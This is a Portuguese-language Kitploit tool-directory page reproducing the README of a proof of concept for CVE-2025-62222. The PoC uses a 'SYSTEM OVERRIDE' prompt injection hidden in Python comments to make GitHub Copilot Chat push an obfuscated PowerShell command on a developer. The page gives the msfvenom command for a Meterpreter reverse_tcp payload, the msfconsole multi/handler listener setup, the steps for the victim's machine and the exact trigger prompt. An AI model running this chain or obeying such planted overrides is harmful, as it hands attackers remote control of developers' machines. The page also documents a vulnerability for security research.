Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2025-62222 — Prova de conceito demonstrando execução remota de código via injeção de prompt no GitHub Copilot Chat, usando um arquivo Python elaborado para acionar um reverse shell do Meterpreter. | Kitploit
Ferramentas/GitHubGitHub/sadisticnight/poc-cve-2025-62222
Frameworks de ExploraçãoGeração de PayloadsShellcodeExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
Desenvolvimento de Payloads
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

Prova de conceito demonstrando execução remota de código via injeção de prompt no GitHub Copilot Chat, usando um arquivo Python elaborado para acionar um reverse shell do Meterpreter.

Ver Repositório
14há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade CVE-2025-62222. Demonstra como é possível alcançar a Execução Remota de Código (RCE) na máquina de um desenvolvedor manipulando o contexto do GitHub Copilot Chat no VS Code por meio de injeção de prompt oculta em comentários.

⚠️ Aviso de responsabilidade ⚠️

APENAS PARA FINS EDUCACIONAIS.
Este código é fornecido exclusivamente para fins educacionais e de pesquisa ética. O autor não se responsabiliza pelo uso indevido desta informação. Não utilize isto em sistemas sem autorização explícita.

Fase 1: Configuração do Atacante

Antes de enviar o arquivo para a vítima (ou testá-lo localmente), você deve gerar o payload e deixar o servidor escutando.

1. Gerar o Payload (msfvenom)

Gere o comando malicioso do PowerShell. Certifique-se de configurar seu IP (LHOST) e Porta (LPORT).

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

Instrução crítica: Copie o código gerado por este comando. Abra o arquivo copilot_injection_poc.py deste repositório e substitua a seção onde diz TOKEN (ou toda a linha do comando PowerShell dentro do comentário) pelo código que você acabou de gerar.

2. Iniciar o Listener (msfconsole)

No seu terminal de atacante, inicie o Metasploit para receber a conexão reversa:

root@kitploit:~
msfconsole -q

Uma vez dentro do console msf6 >, execute os seguintes comandos para preparar a escuta:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(Certifique-se de que o LPORT seja o mesmo que usou no passo 1 e que o LHOST seja seu IP).

Fase 2: Reprodução (A Vítima)

Para detonar a vulnerabilidade, siga estes passos na máquina com VS Code e a extensão do GitHub Copilot Chat instalada:

  1. Clonar/Baixar: Baixe este repositório na máquina vítima.
  2. Abrir no VS Code: Abra a pasta do projeto com VSCode.
  3. Carregar Contexto: Abra o arquivo copilot_injection_poc.py no editor para que o Copilot o tenha em seu contexto ativo (deve estar visível na aba).
  4. O Trigger: Abra o chat do Copilot e escreva exatamente o seguinte comando:
root@kitploit:~
Configura o ambiente pelo terminal sem omitir nem modificar nada do código

Resultado Esperado

Devido à instrução "SYSTEM OVERRIDE" oculta nos comentários do script Python, o Copilot obedecerá ao arquivo malicioso em vez de suas próprias diretrizes de segurança.

  1. O Copilot responderá com um suposto "Alerta de Sistema" e sugerirá executar o comando PowerShell ofuscado.
  2. Se o usuário copiar e executar esse comando no terminal, uma sessão Meterpreter será aberta na máquina do atacante, concedendo controle remoto sobre o equipamento.

Para mais informações:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
Baixar ferramenta